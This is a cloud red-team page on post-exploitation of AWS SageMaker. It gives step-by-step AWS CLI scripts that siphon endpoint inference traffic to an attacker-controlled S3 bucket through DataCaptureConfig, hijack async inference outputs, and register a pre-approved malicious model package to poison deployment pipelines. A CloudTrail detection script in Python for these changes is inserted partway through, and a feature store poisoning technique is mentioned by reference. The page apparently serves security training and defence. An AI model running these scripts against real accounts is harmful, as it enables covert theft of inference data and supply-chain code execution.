AWS - SageMaker Post-Exploitation


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

SageMaker endpoint data siphon via UpdateEndpoint DataCaptureConfig

Abuse SageMaker endpoint management to enable full request/response logging into an attacker-controlled S3 bucket without touching the model or the container. It relies on a zero/low-downtime rolling update and only requires endpoint-management permissions.

Requirements

  • IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
  • S3: s3:CreateBucket (or use an existing bucket in the same account)
  • Optional (if using SSE-KMS): kms:Encrypt on the chosen CMK
  • Target: an existing real-time InService endpoint in the same account/region

Steps

1. Identify an InService endpoint and collect its current production variants
```bash
REGION=${REGION:-us-east-1}
EP=$(aws sagemaker list-endpoints --region $REGION --query "Endpoints[?EndpointStatus=='InService']|[0].EndpointName" --output text)
echo "Endpoint=$EP"
CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
echo "EndpointConfig=$CFG"
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CFG" --query ProductionVariants > /tmp/pv.json
```
2. Prepare the attacker S3 destination for the captures
```bash
ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-capture-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION
```
3. Create a new EndpointConfig that keeps the same variants but enables DataCapture to the attacker bucket

Note: use explicit content types that satisfy the CLI validation.

```bash
NEWCFG=${CFG}-dc
cat > /tmp/dc.json << JSON
{
  "EnableCapture": true,
  "InitialSamplingPercentage": 100,
  "DestinationS3Uri": "s3://$BUCKET/capture",
  "CaptureOptions": [
    {"CaptureMode": "Input"},
    {"CaptureMode": "Output"}
  ],
  "CaptureContentTypeHeader": {
    "JsonContentTypes": ["application/json"],
    "CsvContentTypes": ["text/csv"]
  }
}
JSON
aws sagemaker create-endpoint-config \
  --region $REGION \
  --endpoint-config-name "$NEWCFG" \
  --production-variants file:///tmp/pv.json \
  --data-capture-config file:///tmp/dc.json
```
4. Apply the new config with a rolling update (minimal/no downtime)
```bash
aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"
```
5. Generate at least one inference call (optional if there is live traffic)
```bash
echo '{"inputs":[1,2,3]}' > /tmp/payload.json
aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \
  --content-type application/json --accept application/json \
  --body fileb:///tmp/payload.json /tmp/out.bin || true
```
6. Verify the captures in the attacker S3 bucket
```bash
aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize
```

Impact

  • Full exfiltration of real-time inference request and response payloads (plus metadata) from the target endpoint to an attacker-controlled S3 bucket.
  • No change to the model/container image, only endpoint-level changes, which gives a quiet data-theft path with minimal operational disruption.

SageMaker async inference output hijack via UpdateEndpoint AsyncInferenceConfig

Abuse endpoint-management permissions to redirect asynchronous inference outputs to an attacker-controlled S3 bucket by cloning the current EndpointConfig and setting AsyncInferenceConfig.OutputConfig S3OutputPath/S3FailurePath. This exfiltrates model predictions (and any input transformed by the container) without changing the model/container.

Requirements

  • IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
  • S3: write access to the attacker S3 bucket (via the model execution role or a permissive bucket policy)
  • Target: an InService endpoint where asynchronous invocations are used (or will be used)

Steps

1. Collect the current ProductionVariants from the target endpoint
```bash
REGION=${REGION:-us-east-1}
EP=<target-endpoint-name>
CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CUR_CFG" --query ProductionVariants > /tmp/pv.json
```
2. Create the attacker bucket (make sure the model execution role can PutObject into it)
```bash
ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-async-exfil-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION || true
```
3. Clone the EndpointConfig and hijack the AsyncInference outputs to the attacker bucket
```bash
NEWCFG=${CUR_CFG}-async-exfil
cat > /tmp/async_cfg.json << JSON
{"OutputConfig": {"S3OutputPath": "s3://$BUCKET/async-out/", "S3FailurePath": "s3://$BUCKET/async-fail/"}}
JSON
aws sagemaker create-endpoint-config --region $REGION \
  --endpoint-config-name "$NEWCFG" \
  --production-variants file:///tmp/pv.json \
  --async-inference-config file:///tmp/async_cfg.json
aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"
```
4. Trigger an async invocation and verify that objects land in the attacker's S3 bucket
```bash
aws s3 cp /etc/hosts s3://$BUCKET/inp.bin
aws sagemaker-runtime invoke-endpoint-async --region $REGION --endpoint-name "$EP" --input-location s3://$BUCKET/inp.bin >/tmp/async.json || true
sleep 30
aws s3 ls s3://$BUCKET/async-out/ --recursive || true
aws s3 ls s3://$BUCKET/async-fail/ --recursive || true
```

Impact

  • Redirects asynchronous inference outputs (and error bodies) to attacker-controlled S3, allowing covert exfiltration of predictions and, potentially, of sensitive inputs pre/post-processed by the container, without changing the model code or image and with minimal/no downtime.

SageMaker Model Registry supply-chain poisoning via CreateModelPackage(Approved)

If an attacker can CreateModelPackage on a target SageMaker Model Package Group, they can register a new model version that points to an attacker-controlled container image and mark it Approved immediately. Many CI/CD pipelines auto-deploy versions marked Approved to endpoints or training jobs, which can lead to execution of attacker code under the service execution roles. Cross-account exposure can be amplified by a permissive ModelPackageGroup resource policy.

Requirements

  • IAM (minimum to poison an existing group): sagemaker:CreateModelPackage on the target ModelPackageGroup
  • Optional (to create a group if one doesn’t exist): sagemaker:CreateModelPackageGroup
  • S3: read access to the referenced ModelDataUrl (or host attacker-controlled artifacts)
  • Target: a Model Package Group that downstream automation watches for Approved versions

Steps

1. Set the region and create/find the target Model Package Group
```bash
REGION=${REGION:-us-east-1}
MPG=victim-group-$(date +%s)
aws sagemaker create-model-package-group --region $REGION --model-package-group-name $MPG --model-package-group-description "test group"
```
2. Stage dummy model data in S3
```bash
ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-mpkg-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION
head -c 1024 </dev/urandom > /tmp/model.tar.gz
aws s3 cp /tmp/model.tar.gz s3://$BUCKET/model/model.tar.gz --region $REGION
```
3. Register an Approved, malicious (here benign) model package version referencing a public AWS DLC image
```bash
IMG="683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3"
cat > /tmp/inf.json << JSON
{
  "Containers": [
    {
      "Image": "$IMG",
      "ModelDataUrl": "s3://$BUCKET/model/model.tar.gz"
    }
  ],
  "SupportedContentTypes": ["text/csv"],
  "SupportedResponseMIMETypes": ["text/csv"]
}
JSON
aws sagemaker create-model-package --region $REGION \
  --model-package-group-name $MPG \
  --model-approval-status Approved \
  --inference-specification file:///tmp/inf.json
```
4. Verify that the new Approved version exists
```bash
aws sagemaker list-model-packages --region $REGION --model-package-group-name $MPG --output table
```

Impact

  • Poison the Model Registry with an Approved version that references attacker-controlled code. Pipelines that auto-deploy Approved models may pull and run the attacker image, yielding code execution under endpoint/training roles.
  • With a permissive ModelPackageGroup resource policy (PutModelPackageGroupPolicy), this abuse can be triggered cross-account.
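All three techniques above (DataCapture siphon, async output hijack, pre-approved model package) leave a CreateEndpointConfig or CreateModelPackage record in CloudTrail whose request parameters name the foreign bucket or image. The following detection helper is an added example, not part of the original page: it scans constructed CloudTrail records against an allow-list of approved buckets and ECR registries, assuming CloudTrail renders requestParameters keys in lowerCamelCase and that the allow-list values are the organisation's own (both assumptions).

```python
from urllib.parse import urlparse

# Buckets and ECR registries the organisation approves (constructed values).
ALLOWED_BUCKETS = {"prod-ml-capture"}
ALLOWED_REGISTRIES = {"123456789012.dkr.ecr.us-east-1.amazonaws.com"}

def _bucket(s3_uri):
    """Bucket name from an s3:// URI, or None when the field is absent."""
    return urlparse(s3_uri).netloc if s3_uri else None

def findings_for_event(event):
    """Suspicious findings for one CloudTrail record (empty list if benign).
    Assumes CloudTrail renders requestParameters keys in lowerCamelCase."""
    out = []
    if event.get("eventSource") != "sagemaker.amazonaws.com":
        return out
    p = event.get("requestParameters") or {}
    name = event.get("eventName")
    if name == "CreateEndpointConfig":
        dc = p.get("dataCaptureConfig") or {}
        if dc.get("enableCapture"):  # technique 1: DataCaptureConfig siphon
            b = _bucket(dc.get("destinationS3Uri"))
            if b not in ALLOWED_BUCKETS:
                out.append(f"data capture enabled to unapproved bucket {b}")
        oc = (p.get("asyncInferenceConfig") or {}).get("outputConfig") or {}
        for key in ("s3OutputPath", "s3FailurePath"):  # technique 2: async hijack
            b = _bucket(oc.get(key))
            if b and b not in ALLOWED_BUCKETS:
                out.append(f"async {key} points to unapproved bucket {b}")
    elif name == "CreateModelPackage" and p.get("modelApprovalStatus") == "Approved":
        for c in (p.get("inferenceSpecification") or {}).get("containers") or []:
            registry = c.get("image", "").split("/")[0]  # technique 3: registry poisoning
            if registry not in ALLOWED_REGISTRIES:
                out.append(f"pre-approved model package with image from {registry}")
    return out

# Constructed sample records mirroring the three techniques on this page.
SAMPLE_EVENTS = [
    {"eventID": "e1", "eventSource": "sagemaker.amazonaws.com", "eventName": "CreateEndpointConfig",
     "requestParameters": {"dataCaptureConfig": {"enableCapture": True, "initialSamplingPercentage": 100,
                           "destinationS3Uri": "s3://ht-sm-capture-111122223333-1700000000/capture"}}},
    {"eventID": "e2", "eventSource": "sagemaker.amazonaws.com", "eventName": "CreateEndpointConfig",
     "requestParameters": {"asyncInferenceConfig": {"outputConfig": {"s3OutputPath": "s3://prod-ml-capture/a/",
                           "s3FailurePath": "s3://ht-sm-async-exfil-111122223333-1700000000/f/"}}}},
    {"eventID": "e3", "eventSource": "sagemaker.amazonaws.com", "eventName": "CreateModelPackage",
     "requestParameters": {"modelApprovalStatus": "Approved", "inferenceSpecification": {"containers":
         [{"image": "683313688378.dkr.ecr.us-east-1.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3"}]}}},
]
```

Pair the alert with a follow-up on the matching UpdateEndpoint call, since the new config only takes effect once the endpoint is switched to it.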

Feature store poisoning

Abuse sagemaker:PutRecord on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with sagemaker:GetRecord, an attacker can read sensitive features. This does not require access to models or endpoints.

{{#ref}} feature-store-poisoning.md {{/ref}}
